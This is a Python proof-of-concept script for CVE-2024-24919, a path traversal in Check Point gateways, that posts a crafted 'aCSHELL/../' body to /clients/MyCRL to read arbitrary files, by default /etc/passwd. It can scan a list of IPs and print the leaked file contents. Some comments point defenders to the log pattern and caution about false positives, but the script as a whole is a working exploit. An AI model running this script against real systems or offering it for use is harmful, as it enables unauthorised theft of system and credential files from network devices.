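import argparse

import requests
import urllib3
from colorama import Fore, Style, init

# make_request() sends its probe with verify=False, so the matching urllib3
# warning is silenced here to keep the per-host output readable.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)

# Seconds to wait for each host. Without a limit, one host that accepts the
# connection and never answers stalls the rest of a list scan indefinitely.
REQUEST_TIMEOUT = 10


def print_banner():
    """Print the tool banner to stdout."""
    banner = """
###############################################
# CVE-2024-24919 - Check Point PATH Traversal #
#                  @merlax_                   #
###############################################
"""
    print(banner)


def make_request(host, directory, match_string, show_response):
    """Check one host for CVE-2024-24919 and print the verdict.

    Sends a single POST to ``https://<host>/clients/MyCRL`` whose body is the
    traversal prefix followed by *directory*, then reports the host as
    vulnerable when *match_string* occurs anywhere in the response body.

    Args:
        host: Host name or IP address, used both in the URL and the Host header.
        directory: Absolute path appended to the traversal prefix.
        match_string: Substring whose presence in the response marks a hit.
        show_response: When true, print the response body on a hit.

    Returns:
        None. The verdict, or the request error, is printed.
    """
    url = f"https://{host}/clients/MyCRL"
    headers = {
        'Host': host,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'keep-alive'
    }
    # Defenders: this request shape (a POST to /clients/MyCRL whose body starts
    # with "aCSHELL/../") is the pattern to look for in gateway access logs.
    data = f'aCSHELL/../../../../../../..{directory}'

    try:
        # verify=False: the certificate is not validated, so the answer is not
        # authenticated and could come from a device in front of the target.
        response = requests.post(
            url,
            headers=headers,
            data=data,
            verify=False,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.exceptions.RequestException as e:
        # Timeouts are RequestException subclasses, so they are reported here too.
        print(f"{Fore.RED}[-] Error en {host}: {e}{Style.RESET_ALL}")
        return

    # NOTE(review): the verdict rests on a substring match alone; neither the
    # status code nor the response format is checked. A short marker such as
    # the default "root" can appear in an unrelated error page, so a hit is a
    # lead to confirm, not proof.
    if match_string in response.text:
        print(f"{Fore.GREEN}[+] Host VULNERABLE: {host}{Style.RESET_ALL}")
        if show_response:
            # On a vulnerable host this body is the content of the requested
            # file; treat the tool's output as sensitive data.
            print(response.text)
    else:
        print(f"{Fore.RED}[-] No Vulnerable: {host}{Style.RESET_ALL}")


def main():
    """Parse the command line and check a single host or a list of hosts.

    ``-s`` takes precedence over ``-f``. The list file is read one host per
    line, and blank lines are skipped. When neither option is given, a usage
    hint is printed and nothing is sent.
    """
    parser = argparse.ArgumentParser(description='CVE-2024-24919 - Check Point PATH Traversal check by @merlax_')
    parser.add_argument('-s', help='IP individual')
    parser.add_argument('-f', help='Archivo con la lista de IPs')
    parser.add_argument('-d', default='/etc/passwd', help='Directorio a incluir en el request empezando con /')
    parser.add_argument('-m', default='root', help='String a buscar en la respuesta')
    parser.add_argument('-r', action='store_true', help='Mostrar la respuesta del servidor si se encuentra el string')
    args = parser.parse_args()

    print_banner()

    if args.s:
        make_request(args.s, args.d, args.m, args.r)
    elif args.f:
        with open(args.f, 'r') as f:
            for line in f:
                host = line.strip()
                if host:
                    make_request(host, args.d, args.m, args.r)
    else:
        print("Dame una IP (-s) o un archivo con IPs (-f)")


if __name__ == '__main__':
    main()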